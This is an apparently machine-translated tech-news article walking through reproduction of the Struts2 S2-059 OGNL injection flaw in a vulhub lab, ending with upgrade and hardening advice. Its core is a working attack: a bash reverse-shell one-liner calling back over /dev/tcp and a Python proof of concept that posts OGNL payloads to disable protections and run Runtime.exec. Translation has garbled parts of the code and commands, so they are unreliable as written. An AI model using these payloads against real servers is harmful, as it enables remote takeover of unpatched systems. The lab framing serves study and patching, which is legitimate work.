Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about the recurrence of remote code execution vulnerabilities in Struts2 S2-059. many people may not know much about it. in order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

Introduction to 0x00

Struts2 is a very powerful Java Web open source framework launched by the Apache software organization, which is essentially equivalent to a servlet. Struts2 is based on MVC architecture and has a clear framework. It is usually used as a controller (Controller) to establish the data interaction between the model and the view, which is used to create enterprise-level Java web applications, which utilizes and extends Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the excellent design idea of WebWork as the core, absorbs some of the advantages of Struts framework, and provides a cleaner Web application framework for the implementation of MVC design patterns.

Overview of 0x01 vulnerabilities

An attacker can construct a malicious OGNL expression and set it to be modified by external input and execute the attribute value of the Struts2 tag of the OGNL expression, causing OGNL expression parsing, resulting in the impact of remote code execution.

0x02 scope of influence

Struts 2.0.0-Struts 2.5.20

0x03 environment building

1. The vulnerability environment is quickly built using vulhub, and the download address of vulhub is as follows:

Https://github.com/vulhub/vulhub

Cd vulhub-master/struts2/s2-059

two。 Rapid Construction of shooting range Environment using docker-compose

Docker-compose up-d

3. After startup, you can visit http://ip:8080/?id=1 in the browser to see the test interface.

Recurrence of 0x04 vulnerabilities

1. When the browser accesses http://ip:8080/?id=%25{88*88}, you can find that the executed 88x88 is parsed successfully, and the attribute value of the Struts2 tag of the OGNL expression is executed, causing the OGNL expression to be parsed.

two。 Use poc to bounce shell. Payload that bounces shell needs to use base64 encoding.

Bash-I > & / dev/tcp/172.16.1.132/9967 0 > & 1

Base64 coding URL:

Http://www.jackson-t.ca/runtime-exec-payloads.html

Import requestsurl = "http://127.0.0.1:8080"data1 = {" id ":"% {(# context=#attr ['struts.valueStack'] .context). (# container=#context [' com.opensymphony.xwork2.ActionContext.container']). (# ognlUtil=#container.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class)). (# ognlUtil.setExcludedClasses (')). (# ognlUtil.setExcludedPackageNames ('))} "} data2 = {" id ": "% {(# context=#attr ['struts.valueStack'] .context). (# context.setMemberAccess (@ ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)). (@ java.lang.Runtime@getRuntime () .exec (' payload-base64 encoding'))}"} res1 = requests.post (url) Data=data1) res2 = requests.post (url, data=data2)

3. Modify the payload in poc to your own payload, and then run it with python. You can see that the shell has rebounded.

0x05 repair recommendation

1. Upgrade to Struts 2.5.22 or later

two。 Turn on ONGL expression injection protection.

Https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable

After reading the above, do you have any further understanding of the recurrence of remote code execution vulnerabilities in Struts2 S2-059? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.